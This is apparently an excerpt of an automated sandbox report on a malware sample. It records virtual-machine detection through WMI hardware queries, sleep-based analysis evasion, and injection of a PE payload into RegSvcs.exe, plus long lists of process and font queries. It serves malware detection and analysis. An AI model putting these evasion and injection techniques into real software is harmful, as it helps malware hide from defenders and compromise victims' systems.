            Source: C:\Users\user\Desktop\g0PWOnCNZH.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\g0PWOnCNZH.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\g0PWOnCNZH.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX

            Malware Analysis System Evasion

            barindex
            Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapterConfiguration
            Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
            Source: C:\Users\user\Desktop\g0PWOnCNZH.exe TID: 5960Thread sleep time: -40023s >= -30000s
            Source: C:\Users\user\Desktop\g0PWOnCNZH.exe TID: 5980Thread sleep time: -922337203685477s >= -30000s
            Source: C:\Users\user\Desktop\g0PWOnCNZH.exeThread delayed: delay time: 922337203685477
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWindow / User API: threadDelayed 642
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
            Source: C:\Users\user\Desktop\g0PWOnCNZH.exeProcess information queried: ProcessInformation
            Source: C:\Users\user\Desktop\g0PWOnCNZH.exeThread delayed: delay time: 40023
            Source: C:\Users\user\Desktop\g0PWOnCNZH.exeThread delayed: delay time: 922337203685477
            Source: RegSvcs.exe, 00000001.00000003.292874133.0000000005B21000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 00000001.00000002.528335523.0000000005B31000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
            Source: C:\Users\user\Desktop\g0PWOnCNZH.exeProcess token adjusted: Debug
            Source: C:\Users\user\Desktop\g0PWOnCNZH.exeMemory allocated: page read and write | page guard

            HIPS / PFW / Operating System Protection Evasion

            barindex
            Writes to foreign memory regions
            Source: C:\Users\user\Desktop\g0PWOnCNZH.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 400000
            Source: C:\Users\user\Desktop\g0PWOnCNZH.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 402000
            Source: C:\Users\user\Desktop\g0PWOnCNZH.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 42C000
            Source: C:\Users\user\Desktop\g0PWOnCNZH.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 42E000
            Source: C:\Users\user\Desktop\g0PWOnCNZH.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 6CB008
            Allocates memory in foreign processes
            Source: C:\Users\user\Desktop\g0PWOnCNZH.exeMemory allocated: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 400000 protect: page execute and read and write
            Injects a PE file into a foreign processes
            Source: C:\Users\user\Desktop\g0PWOnCNZH.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 400000 value starts with: 4D5A
            Source: C:\Users\user\Desktop\g0PWOnCNZH.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
            Source: C:\Users\user\Desktop\g0PWOnCNZH.exeQueries volume information: C:\Users\user\Desktop\g0PWOnCNZH.exe VolumeInformation
            Source: C:\Users\user\Desktop\g0PWOnCNZH.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
            Source: C:\Users\user\Desktop\g0PWOnCNZH.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
            Source: C:\Users\user\Desktop\g0PWOnCNZH.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
            Source: C:\Users\user\Desktop\g0PWOnCNZH.exeQueries volume information: C:\Windows\Fonts\arial.ttf VolumeInformation
            Source: C:\Users\user\Desktop\g0PWOnCNZH.exeQueries volume information: C:\Windows\Fonts\ariali.ttf VolumeInformation
            Source: C:\Users\user\Desktop\g0PWOnCNZH.exeQueries volume information: C:\Windows\Fonts\arialbd.ttf VolumeInformation
            Source: C:\Users\user\Desktop\g0PWOnCNZH.exeQueries volume information: C:\Windows\Fonts\arialbi.ttf VolumeInformation
            Source: C:\Users\user\Desktop\g0PWOnCNZH.exeQueries volume information: C:\Windows\Fonts\ARIALN.TTF VolumeInformation
            Source: C:\Users\user\Desktop\g0PWOnCNZH.exeQueries volume information: C:\Windows\Fonts\ariblk.ttf VolumeInformation
            Source: C:\Users\user\Desktop\g0PWOnCNZH.exeQueries volume information: C:\Windows\Fonts\ARIALNI.TTF VolumeInformation
            Source: C:\Users\user\Desktop\g0PWOnCNZH.exeQueries volume information: C:\Windows\Fonts\ARIALNB.TTF VolumeInformation
            Source: C:\Users\user\Desktop\g0PWOnCNZH.exeQueries volume information: C:\Windows\Fonts\ARIALNBI.TTF VolumeInformation
            Source: C:\Users\user\Desktop\g0PWOnCNZH.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformation
            Source: C:\Users\user\Desktop\g0PWOnCNZH.exeQueries volume information: C:\Windows\Fonts\calibri.ttf VolumeInformation
            Source: C:\Users\user\Desktop\g0PWOnCNZH.exeQueries volume information: C:\Windows\Fonts\calibril.ttf VolumeInformation
            Source: C:\Users\user\Desktop\g0PWOnCNZH.exeQueries volume information: C:\Windows\Fonts\calibrii.ttf VolumeInformation
            Source: C:\Users\user\Desktop\g0PWOnCNZH.exeQueries volume information: C:\Windows\Fonts\calibrili.ttf VolumeInformation
            Source: C:\Users\user\Desktop\g0PWOnCNZH.exeQueries volume information: C:\Windows\Fonts\calibrib.ttf VolumeInformation
            Source: C:\Users\user\Desktop\g0PWOnCNZH.exeQueries volume information: C:\Windows\Fonts\calibriz.ttf VolumeInformation
            Source: C:\Users\user\Desktop\g0PWOnCNZH.exeQueries volume information: C:\Windows\Fonts\cambria.ttc VolumeInformation
            Source: C:\Users\user\Desktop\g0PWOnCNZH.exeQueries volume information: C:\Windows\Fonts\cambriai.ttf VolumeInformation
            Source: C:\Users\user\Desktop\g0PWOnCNZH.exeQueries volume information: C:\Windows\Fonts\cambriab.ttf VolumeInformation
            Source: C:\Users\user\Desktop\g0PWOnCNZH.exeQueries volume information: C:\Windows\Fonts\cambriaz.ttf VolumeInformation
            Source: C:\Users\user\Desktop\g0PWOnCNZH.exeQueries volume information: C:\Windows\Fonts\Candara.ttf VolumeInformation
            Source: C:\Users\user\Desktop\g0PWOnCNZH.exeQueries volume information: C:\Windows\Fonts\Candarai.ttf VolumeInformation
            Source: C:\Users\user\Desktop\g0PWOnCNZH.exeQueries volume information: C:\Windows\Fonts\Candarab.ttf VolumeInformation
            Source: C:\Users\user\Desktop\g0PWOnCNZH.exeQueries volume information: C:\Windows\Fonts\Candaraz.ttf VolumeInformation
            Source: C:\Users\user\Desktop\g0PWOnCNZH.exeQueries volume information: C:\Windows\Fonts\comic.ttf VolumeInformation
            Source: C:\Users\user\Desktop\g0PWOnCNZH.exeQueries volume information: C:\Windows\Fonts\comici.ttf VolumeInformation
            Source: C:\Users\user\Desktop\g0PWOnCNZH.exeQueries volume information: C:\Windows\Fonts\comicbd.ttf VolumeInformation
            Source: C:\Users\user\Desktop\g0PWOnCNZH.exeQueries volume information: C:\Windows\Fonts\comicz.ttf VolumeInformation
            Source: C:\Users\user\Desktop\g0PWOnCNZH.exeQueries volume information: C:\Windows\Fonts\consola.ttf VolumeInformation
            Source: C:\Users\user\Desktop\g0PWOnCNZH.exeQueries volume information: C:\Windows\Fonts\consolai.ttf VolumeInformation
            Source: C:\Users\user\Desktop\g0PWOnCNZH.exeQueries volume information: C:\Windows\Fonts\consolab.ttf VolumeInformation
            Source: C:\Users\user\Desktop\g0PWOnCNZH.exeQueries volume information: C:\Windows\Fonts\consolaz.ttf VolumeInformation
            Source: C:\Users\user\Desktop\g0PWOnCNZH.exeQueries volume information: C:\Windows\Fonts\constan.ttf VolumeInformation
            Source: C:\Users\user\Desktop\g0PWOnCNZH.exeQueries volume information: C:\Windows\Fonts\constani.ttf VolumeInformation
            Source: C:\Users\user\Desktop\g0PWOnCNZH.exeQueries volume information: C:\Windows\Fonts\constanb.ttf VolumeInformation
            Source: C:\Users\user\Desktop\g0PWOnCNZH.exeQueries volume information: C:\Windows\Fonts\constanz.ttf VolumeInformation
            Source: C:\Users\user\Desktop\g0PWOnCNZH.exeQueries volume information: C:\Windows\Fonts\corbel.ttf VolumeInformation
            Source: C:\Users\user\Desktop\g0PWOnCNZH.exeQueries volume information: C:\Windows\Fonts\corbeli.ttf VolumeInformation
            Source: C:\Users\user\Desktop\g0PWOnCNZH.exeQueries volume information: C:\Windows\Fonts\corbelb.ttf VolumeInformation
            Source: C:\Users\user\Desktop\g0PWOnCNZH.exeQueries volume information: C:\Windows\Fonts\corbelz.ttf VolumeInformation
            Source: C:\Users\user\Desktop\g0PWOnCNZH.exeQueries volume information: C:\Windows\Fonts\cour.ttf VolumeInformation
            Source: C:\Users\user\Desktop\g0PWOnCNZH.exeQueries volume information: C:\Windows\Fonts\couri.ttf VolumeInformation
            Source: C:\Users\user\Desktop\g0PWOnCNZH.exeQueries volume information: C:\Windows\Fonts\courbd.ttf VolumeInformation
            Source: C:\Users\user\Desktop\g0PWOnCNZH.exeQueries volume information: C:\Windows\Fonts\courbi.ttf VolumeInformation
            Source: C:\Users\user\Desktop\g0PWOnCNZH.exeQueries volume information: C:\Windows\Fonts\ebrima.ttf VolumeInformation
            Source: C:\Users\user\Desktop\g0PWOnCNZH.exeQueries volume information: C:\Windows\Fonts\ebrimabd.ttf VolumeInformation
            Source: C:\Users\user\Desktop\g0PWOnCNZH.exeQueries volume information: C:\Windows\Fonts\framd.ttf VolumeInformation
            Source: C:\Users\user\Desktop\g0PWOnCNZH.exeQueries volume information: C:\Windows\Fonts\FRADM.TTF VolumeInformation
            Source: C:\Users\user\Desktop\g0PWOnCNZH.exeQueries volume information: C:\Windows\Fonts\framdit.ttf VolumeInformation
            Source: C:\Users\user\Desktop\g0PWOnCNZH.exeQueries volume information: C:\Windows\Fonts\FRADMIT.TTF VolumeInformation
            Source: C:\Users\user\Desktop\g0PWOnCNZH.exeQueries volume information: C:\Windows\Fonts\FRAMDCN.TTF VolumeInformation
            Source: C:\Users\user\Desktop\g0PWOnCNZH.exeQueries volume information: C:\Windows\Fonts\FRADMCN.TTF VolumeInformation
            Source: C:\Users\user\Desktop\g0PWOnCNZH.exeQueries volume information: C:\Windows\Fonts\FRAHV.TTF VolumeInformation
            Source: C:\Users\user\Desktop\g0PWOnCNZH.exeQueries volume information: C:\Windows\Fonts\FRAHVIT.TTF VolumeInformation
            Source: C:\Users\user\Desktop\g0PWOnCNZH.exeQueries volume information: C:\Windows\Fonts\Gabriola.ttf VolumeInformation
            Source: C:\Users\user\Desktop\g0PWOnCNZH.exeQueries volume information: C:\Windows\Fonts\gadugi.ttf VolumeInformation
            Source: C:\Users\user\Desktop\g0PWOnCNZH.exeQueries volume information: C:\Windows\Fonts\gadugib.ttf VolumeInformation
            Source: C:\Users\user\Desktop\g0PWOnCNZH.exeQueries volume information: C:\Windows\Fonts\georgia.ttf VolumeInformation
            Source: C:\Users\user\Desktop\g0PWOnCNZH.exeQueries volume information: C:\Windows\Fonts\georgiai.ttf VolumeInformation
            Source: C:\Users\user\Desktop\g0PWOnCNZH.exeQueries volume information: C:\Windows\Fonts\georgiab.ttf VolumeInformation
            Source: C:\Users\user\Desktop\g0PWOnCNZH.exeQueries volume information: C:\Windows\Fonts\georgiaz.ttf VolumeInformation
            Source: C:\Users\user\Desktop\g0PWOnCNZH.exeQueries volume information: C:\Windows\Fonts\impact.ttf VolumeInformation
            Source: C:\Users\user\Desktop\g0PWOnCNZH.exeQueries volume information: C:\Windows\Fonts\Inkfree.ttf VolumeInformation
            Source: C:\Users\user\Desktop\g0PWOnCNZH.exeQueries volume information: C:\Windows\Fonts\javatext.ttf VolumeInformation
            Source: C:\Users\user\Desktop\g0PWOnCNZH.exeQueries volume information: C:\Windows\Fonts\LeelawUI.ttf VolumeInformation
            Source: C:\Users\user\Desktop\g0PWOnCNZH.exeQueries volume information: C:\Windows\Fonts\LeelUIsl.ttf VolumeInformation
            Source: C:\Users\user\Desktop\g0PWOnCNZH.exeQueries volume information: C:\Windows\Fonts\LeelaUIb.ttf VolumeInformation
            Source: C:\Users\user\Desktop\g0PWOnCNZH.exeQueries volume information: C:\Windows\Fonts\lucon.ttf VolumeInformation
            Source: C:\Users\user\Desktop\g0PWOnCNZH.exeQueries volume information: C:\Windows\Fonts\l_10646.ttf VolumeInformation
            Source: C:\Users\user\Desktop\g0PWOnCNZH.exeQueries volume information: C:\Windows\Fonts\malgun.ttf VolumeInformation
            Source: C:\Users\user\Desktop\g0PWOnCNZH.exeQueries volume information: C:\Windows\Fonts\malgunsl.ttf VolumeInformation
            Source: C:\Users\user\Desktop\g0PWOnCNZH.exeQueries volume information: C:\Windows\Fonts\malgunbd.ttf VolumeInformation
            Source: C:\Users\user\Desktop\g0PWOnCNZH.exeQueries volume information: C:\Windows\Fonts\himalaya.ttf VolumeInformation
            Source: C:\Users\user\Desktop\g0PWOnCNZH.exeQueries volume information: C:\Windows\Fonts\msjh.ttc VolumeInformation
            Source: C:\Users\user\Desktop\g0PWOnCNZH.exeQueries volume information: C:\Windows\Fonts\msjhl.ttc VolumeInformation
            Source: C:\Users\user\Desktop\g0PWOnCNZH.exeQueries volume information: C:\Windows\Fonts\msjhbd.ttc VolumeInformation
            Source: C:\Users\user\Desktop\g0PWOnCNZH.exeQueries volume information: C:\Windows\Fonts\ntailu.ttf VolumeInformation
            Source: C:\Users\user\Desktop\g0PWOnCNZH.exeQueries volume information: C:\Windows\Fonts\ntailub.ttf VolumeInformation
            Source: C:\Users\user\Desktop\g0PWOnCNZH.exeQueries volume information: C:\Windows\Fonts\phagspa.ttf VolumeInformation
            Source: C:\Users\user\Desktop\g0PWOnCNZH.exeQueries volume information: C:\Windows\Fonts\phagspab.ttf VolumeInformation
            Source: C:\Users\user\Desktop\g0PWOnCNZH.exeQueries volume information: C:\Windows\Fonts\micross.ttf VolumeInformation
            Source: C:\Users\user\Desktop\g0PWOnCNZH.exeQueries volume information: C:\Windows\Fonts\taile.ttf VolumeInformation
            Source: C:\Users\user\Desktop\g0PWOnCNZH.exeQueries volume information: C:\Windows\Fonts\taileb.ttf VolumeInformation
            Source: C:\Users\user\Desktop\g0PWOnCNZH.exeQueries volume information: C:\Windows\Fonts\msyh.ttc VolumeInformation
            Source: C:\Users\user\Desktop\g0PWOnCNZH.exeQueries volume information: C:\Windows\Fonts\msyhl.ttc VolumeInformation
            Source: C:\Users\user\Desktop\g0PWOnCNZH.exeQueries volume information: C:\Windows\Fonts\msyhbd.ttc VolumeInformation
            Source: C:\Users\user\Desktop\g0PWOnCNZH.exeQueries volume information: C:\Windows\Fonts\msyi.ttf VolumeInformation
            Source: C:\Users\user\Desktop\g0PWOnCNZH.exeQueries volume information: C:\Windows\Fonts\mingliub.ttc VolumeInformation
            Source: C:\Users\user\Desktop\g0PWOnCNZH.exeQueries volume information: C:\Windows\Fonts\monbaiti.ttf VolumeInformation
            Source: C:\Users\user\Desktop\g0PWOnCNZH.exeQueries volume information: C:\Windows\Fonts\msgothic.ttc VolumeInformation
            Source: C:\Users\user\Desktop\g0PWOnCNZH.exeQueries volume information: C:\Windows\Fonts\mvboli.ttf VolumeInformation
            Source: C:\Users\user\Desktop\g0PWOnCNZH.exeQueries volume information: C:\Windows\Fonts\mmrtext.ttf VolumeInformation
            Source: C:\Users\user\Desktop\g0PWOnCNZH.exeQueries volume information: C:\Windows\Fonts\mmrtextb.ttf VolumeInformation
            Source: C:\Users\user\Desktop\g0PWOnCNZH.exeQueries volume information: C:\Windows\Fonts\Nirmala.ttf VolumeInformation
            Source: C:\Users\user\Desktop\g0PWOnCNZH.exeQueries volume information: C:\Windows\Fonts\NirmalaS.ttf VolumeInformation
            Source: C:\Users\user\Desktop\g0PWOnCNZH.exeQueries volume information: C:\Windows\Fonts\NirmalaB.ttf VolumeInformation
            Source: C:\Users\user\Desktop\g0PWOnCNZH.exeQueries volume information: C:\Windows\Fonts\pala.ttf VolumeInformation
            Source: C:\Users\user\Desktop\g0PWOnCNZH.exeQueries volume information: C:\Windows\Fonts\palai.ttf VolumeInformation
            Source: C:\Users\user\Desktop\g0PWOnCNZH.exeQueries volume information: C:\Windows\Fonts\palab.ttf VolumeInformation
            Source: C:\Users\user\Desktop\g0PWOnCNZH.exeQueries volume information: C:\Windows\Fonts\palabi.ttf VolumeInformation
            Source: C:\Users\user\Desktop\g0PWOnCNZH.exeQueries volume information: C:\Windows\Fonts\segoepr.ttf VolumeInformation
            Source: C:\Users\user\Desktop\g0PWOnCNZH.exeQueries volume information: C:\Windows\Fonts\segoeprb.ttf VolumeInformation
            Source: C:\Users\user\Desktop\g0PWOnCNZH.exeQueries volume information: C:\Windows\Fonts\segoesc.ttf VolumeInformation
            Source: C:\Users\user\Desktop\g0PWOnCNZH.exeQueries volume information: C:\Windows\Fonts\segoescb.ttf VolumeInformation
            Source: C:\Users\user\Desktop\g0PWOnCNZH.exeQueries volume information: C:\Windows\Fonts\segoeuii.ttf VolumeInformation
            Source: C:\Users\user\Desktop\g0PWOnCNZH.exeQueries volume information: C:\Windows\Fonts\seguisli.ttf VolumeInformation
            Source: C:\Users\user\Desktop\g0PWOnCNZH.exeQueries volume information: C:\Windows\Fonts\seguili.ttf VolumeInformation
            Source: C:\Users\user\Desktop\g0PWOnCNZH.exeQueries volume information: C:\Windows\Fonts\seguisbi.ttf VolumeInformation
            Source: C:\Users\user\Desktop\g0PWOnCNZH.exeQueries volume information: C:\Windows\Fonts\segoeuiz.ttf VolumeInformation
            Source: C:\Users\user\Desktop\g0PWOnCNZH.exeQueries volume information: C:\Windows\Fonts\seguibl.ttf VolumeInformation
            Source: C:\Users\user\Desktop\g0PWOnCNZH.exeQueries volume information: C:\Windows\Fonts\seguibli.ttf VolumeInformation
            Source: C:\Users\user\Desktop\g0PWOnCNZH.exeQueries volume information: C:\Windows\Fonts\seguiemj.ttf VolumeInformation
            Source: C:\Users\user\Desktop\g0PWOnCNZH.exeQueries volume information: C:\Windows\Fonts\seguihis.ttf VolumeInformation
            Source: C:\Users\user\Desktop\g0PWOnCNZH.exeQueries volume information: C:\Windows\Fonts\seguisym.ttf VolumeInformation
            Source: C:\Users\user\Desktop\g0PWOnCNZH.exeQueries volume information: C:\Windows\Fonts\simsun.ttc VolumeInformation
            Source: C:\Users\user\Desktop\g0PWOnCNZH.exeQueries volume information: C:\Windows\Fonts\simsunb.ttf VolumeInformation
            Source: C:\Users\user\Desktop\g0PWOnCNZH.exeQueries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformation
            Source: C:\Users\user\Desktop\g0PWOnCNZH.exeQueries volume information: C:\Windows\Fonts\SitkaI.ttc VolumeInformation
            Source: C:\Users\user\Desktop\g0PWOnCNZH.exeQueries volume information: C:\Windows\Fonts\SitkaB.ttc VolumeInformation
            Source: C:\Users\user\Desktop\g0PWOnCNZH.exeQueries volume information: C:\Windows\Fonts\SitkaZ.ttc VolumeInformation
            Source: C:\Users\user\Desktop\g0PWOnCNZH.exeQueries volume information: C:\Windows\Fonts\sylfaen.ttf VolumeInformation
            Source: C:\Users\user\Desktop\g0PWOnCNZH.exeQueries volume information: C:\Windows\Fonts\symbol.ttf VolumeInformation
            Source: C:\Users\user\Desktop\g0PWOnCNZH.exeQueries volume information: C:\Windows\Fonts\tahoma.ttf VolumeInformation
            Source: C:\Users\user\Desktop\g0PWOnCNZH.exeQueries volume information: C:\Windows\Fonts\tahomabd.ttf VolumeInformation
            Source: C:\Users\user\Desktop\g0PWOnCNZH.exeQueries volume information: C:\Windows\Fonts\timesi.ttf VolumeInformation
            Source: C:\Users\user\Desktop\g0PWOnCNZH.exeQueries volume information: C:\Windows\Fonts\timesbd.ttf VolumeInformation
            Source: C:\Users\user\Desktop\g0PWOnCNZH.exeQueries volume information: C:\Windows\Fonts\timesbi.ttf VolumeInformation
            Source: C:\Users\user\Desktop\g0PWOnCNZH.exeQueries volume information: C:\Windows\Fonts\trebuc.ttf VolumeInformation
            Source: C:\Users\user\Desktop\g0PWOnCNZH.exeQueries volume information: C:\Windows\Fonts\trebucit.ttf VolumeInformation
            Source: C:\Users\user\Desktop\g0PWOnCNZH.exeQueries volume information: C:\Windows\Fonts\trebucbd.ttf VolumeInformation
            Source: C:\Users\user\Desktop\g0PWOnCNZH.exeQueries volume information: C:\Windows\Fonts\trebucbi.ttf VolumeInformation
            Source: C:\Users\user\Desktop\g0PWOnCNZH.exeQueries volume information: C:\Windows\Fonts\verdana.ttf VolumeInformation
            Source: C:\Users\user\Desktop\g0PWOnCNZH.exeQueries volume information: C:\Windows\Fonts\verdanai.ttf VolumeInformation
            Source: C:\Users\user\Desktop\g0PWOnCNZH.exeQueries volume information: C:\Windows\Fonts\verdanab.ttf VolumeInformation
            Source: C:\Users\user\Desktop\g0PWOnCNZH.exeQueries volume information: C:\Windows\Fonts\verdanaz.ttf VolumeInformation
            Source: C:\Users\user\Desktop\g0PWOnCNZH.exeQueries volume information: C:\Windows\Fonts\webdings.ttf VolumeInformation
            Source: C:\Users\user\Desktop\g0PWOnCNZH.exeQueries volume information: C:\Windows\Fonts\wingding.ttf VolumeInformation
            Source: C:\Users\user\Desktop\g0PWOnCNZH.exeQueries volume information: C:\Windows\Fonts\YuGothR.ttc VolumeInformation
